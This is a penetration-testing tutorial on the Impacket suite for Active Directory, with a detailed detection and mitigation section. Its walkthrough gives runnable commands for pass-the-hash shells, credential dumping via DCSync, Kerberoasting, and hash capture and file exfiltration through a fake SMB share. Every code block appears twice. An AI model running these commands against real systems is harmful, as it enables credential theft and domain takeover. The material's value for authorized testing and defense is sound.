Mastering the Impacket Suite: From Lateral Movement to Credential Extraction

Disclaimer: This article is for education and authorized security testing only. Run these tools exclusively against systems you own or have explicit, written permission to test. Unauthorized access to computer systems is a crime in virtually every jurisdiction.

Introduction / Overview

Impacket is a collection of Python classes for working with network protocols, maintained by Fortra (formerly SecureAuth). For anyone testing Windows and Active Directory environments, it is the swiss-army knife: pure-Python implementations of SMB, MSRPC, DCE/RPC, Kerberos, LDAP and NTLM that ship with dozens of ready-to-run example scripts.

In this article you will learn how five of the most important example scripts work and how to use them accurately:

• psexec.py — semi-interactive shell via a Windows service (SYSTEM).
• wmiexec.py — quieter command execution over WMI/DCOM.
• secretsdump.py — remote and offline credential extraction.
• GetUserSPNs.py — Kerberoasting from a low-privileged account.
• smbserver.py — a fake SMB share for file transfer and hash capture.

Equal weight is given to the Detection & Defense section, because every one of these techniques leaves recognizable artifacts.

How it works / Background

Impacket scripts implement Windows protocols directly, so they do not need a Windows host or the Windows API. Two protocol families matter most:

• SMB + DCE/RPC over named pipes. SMB (TCP/445) carries named pipes such as \svcctl (Service Control Manager) and \winreg (Remote Registry). psexec and the service-based parts of secretsdump ride these pipes.
• DCOM/WMI over MSRPC. wmiexec uses the IWbemServices interface (WMI) over DCOM, brokered by the RPC endpoint mapper on TCP/135 and a dynamic high port.

Authentication is either NTLM or Kerberos. Impacket fully supports pass-the-hash (-hashes LM:NT), pass-the-ticket (-k -no-pass with a KRB5CCNAME ticket), and AES keys (-aesKey). This is what makes it so powerful: a recovered NT hash is as good as a password.

For background on how NTLM hashes are abused, see Pass-the-Hash explained.

Prerequisites / Lab setup

• A lab domain (e.g. lab.local) with a Domain Controller and at least one member server. Build one with a vulnerable AD lab if you don't have one.
• Impacket installed in an isolated environment:

pipx install impacket
# or
python3 -m pip install impacket

pipx install impacket
# or
python3 -m pip install impacket

• A foothold credential set: a username with a password or an NT hash, plus network reachability to TCP/445, TCP/135 and dynamic RPC ports.

Throughout, credentials are written as domain/user:password@target.

Attack walkthrough / PoC

1. psexec.py — SYSTEM shell

psexec.py uploads a service binary to the ADMIN$ share, registers it via the Service Control Manager (\svcctl), and starts it. Output is relayed over a named pipe, giving a semi-interactive shell running as NT AUTHORITY\SYSTEM.

# Password auth
psexec.py lab.local/administrator:'P@ssw0rd!'@10.10.10.5

# Pass-the-hash (LM:NT, empty LM is fine)
psexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.5

# Password auth
psexec.py lab.local/administrator:'P@ssw0rd!'@10.10.10.5

# Pass-the-hash (LM:NT, empty LM is fine)
psexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.5

It is loud (drops a binary, creates a service), but reliable. Use it when stealth is not the priority.

2. wmiexec.py — quieter execution

wmiexec.py executes commands through WMI's Win32_Process.Create and reads the output from a temp file over SMB. No service is created and no binary is dropped, so it is considerably quieter than psexec.

wmiexec.py lab.local/svc_sql:'Summer2025'@10.10.10.6

# Run a single command non-interactively, then exit
wmiexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.6 'whoami /all'

wmiexec.py lab.local/svc_sql:'Summer2025'@10.10.10.6

# Run a single command non-interactively, then exit
wmiexec.py -hashes :a9fd…NTHASH lab.local/administrator@10.10.10.6 'whoami /all'

Note that wmiexec runs each command in a fresh process, so there is no persistent shell state (your cd is emulated client-side).

3. secretsdump.py — credential extraction

secretsdump.py is the credential-dumping workhorse. Against a target it extracts:

• SAM local account hashes (via \winreg remote registry).
• LSA secrets and cached domain credentials.
• NTDS.dit domain hashes via DRSUAPI replication (DRSGetNCChanges) — the same primitive as DCSync.

# Local SAM + LSA secrets from a member host (needs local admin)
secretsdump.py lab.local/administrator:'P@ssw0rd!'@10.10.10.6

# Full domain dump via DCSync against a DC (needs replication rights)
secretsdump.py -just-dc lab.local/administrator@10.10.10.5

# Offline dump from registry hives you already exfiltrated
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

# Local SAM + LSA secrets from a member host (needs local admin)
secretsdump.py lab.local/administrator:'P@ssw0rd!'@10.10.10.6

# Full domain dump via DCSync against a DC (needs replication rights)
secretsdump.py -just-dc lab.local/administrator@10.10.10.5

# Offline dump from registry hives you already exfiltrated
secretsdump.py -sam SAM -system SYSTEM -security SECURITY LOCAL

The -just-dc-ntlm flag limits output to NTLM hashes; -history includes password history. See DCSync attacks for the replication mechanics.

4. GetUserSPNs.py — Kerberoasting

GetUserSPNs.py queries LDAP for accounts with a Service Principal Name (servicePrincipalName) set, then requests TGS-REP tickets. Those tickets are encrypted with the service account's password-derived key, so they can be cracked offline. Any authenticated domain user can do this.

GetUserSPNs.py -request -dc-ip 10.10.10.5 lab.local/lowpriv:'UserPass1'

# Crack with hashcat mode 13100 (RC4) or 19700 (AES256)
hashcat -m 13100 spn_hashes.txt rockyou.txt

GetUserSPNs.py -request -dc-ip 10.10.10.5 lab.local/lowpriv:'UserPass1'

# Crack with hashcat mode 13100 (RC4) or 19700 (AES256)
hashcat -m 13100 spn_hashes.txt rockyou.txt

For the full crack-and-abuse chain, see Kerberoasting complete guide.

5. smbserver.py — file transfer and hash capture

smbserver.py spins up a fake SMB server. Use it to move files off a Windows host without touching disk via HTTP, and — more interestingly — to capture NetNTLMv2 hashes when a victim authenticates to your share (e.g. via a coerced UNC path).

# Share named "share" mapped to /tmp/loot, capturing auth attempts
smbserver.py -smb2support share /tmp/loot

# Share named "share" mapped to /tmp/loot, capturing auth attempts
smbserver.py -smb2support share /tmp/loot

On the victim, copy C:\loot.zip \\10.10.10.99\share\ exfiltrates the file; any NTLM authentication directed at the server is logged for offline cracking or relaying.

Attack flow

Text version: a foothold enables Kerberoasting and lateral movement; dumping local secrets yields a reusable admin hash, which is used to DCSync the DC and compromise the entire domain.

Detection & Defense (Blue Team)

These techniques map to MITRE ATT&CK: T1569.002 (Service Execution / psexec), T1047 (WMI / wmiexec), T1003.001/.002/.003 (OS Credential Dumping), T1003.006 (DCSync), and T1558.003 (Kerberoasting).

Detection

• psexec.py: Windows Security Event 4697 (a service was installed) and System Event 7045, especially with random 8-character service names and a binary path in %SYSTEMROOT%. Sysmon Event 11 for file creation in ADMIN$/C:\Windows.
• wmiexec.py: Event 4688 showing wmiprvse.exe spawning cmd.exe /Q /c … with output redirected to \\127.0.0.1\ADMIN$\__<epoch> — a near-unique Impacket signature. Enable WMI-Activity operational logging.
• secretsdump.py / DCSync: Event 4662 on the DC where a non-DC principal requests the replication GUIDs 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2 (DS-Replication-Get-Changes) and 1131f6ad-… (…-All). For local SAM dumping, watch remote-registry (\winreg) access and Event 4624 logon type 3 to ADMIN$/IPC$.
• GetUserSPNs.py: Event 4769 (Kerberos service ticket requested) with encryption type 0x17 (RC4) in bulk from a single account is a classic Kerberoasting indicator.
• smbserver.py / coercion: Outbound SMB to unexpected internal hosts, and NetNTLMv2 authentication to non-domain systems.

Defense / Mitigation

• Tier your admins. Never log a Domain Admin into a member workstation; this prevents secretsdump from harvesting privileged hashes. Use the tiered administration model.
• Enable LSA Protection (RunAsPPL) and Credential Guard to make credential extraction far harder.
• Strong, long service-account passwords (25+ chars) or gMSA / dMSA managed accounts defeat Kerberoasting; disable RC4 in Kerberos where possible (msDS-SupportedEncryptionTypes).
• Enforce SMB signing and disable NTLM where feasible to break relay and hash capture from smbserver.py.
• Restrict replication rights so only Domain Controllers hold DS-Replication-Get-Changes-All, and alert on any 4662 deviation.
• Restrict remote service creation and WMI via host firewall and Attack Surface Reduction rules; segment so workstations cannot reach 445/135 on each other.

Conclusion

Impacket condenses years of Windows protocol research into a handful of Python scripts. The same five tools that drive a domain compromise — psexec, wmiexec, secretsdump, GetUserSPNs and smbserver — also produce highly recognizable telemetry. Defenders who instrument service creation (4697/7045), WMI process trees (4688), Kerberos ticket requests (4769) and replication access (4662) can catch nearly every step. Master the offense to build the defense.

References

• Impacket — https://github.com/fortra/impacket
• MITRE ATT&CK T1003 OS Credential Dumping — https://attack.mitre.org/techniques/T1003/
• MITRE ATT&CK T1558.003 Kerberoasting — https://attack.mitre.org/techniques/T1558/003/
• MITRE ATT&CK T1569.002 Service Execution — https://attack.mitre.org/techniques/T1569/002/
• MITRE ATT&CK T1047 Windows Management Instrumentation — https://attack.mitre.org/techniques/T1047/
• HackTricks — Impacket / AD methodology — https://book.hacktricks.xyz/
• Microsoft — Credential Guard & LSA Protection — https://learn.microsoft.com/windows/security/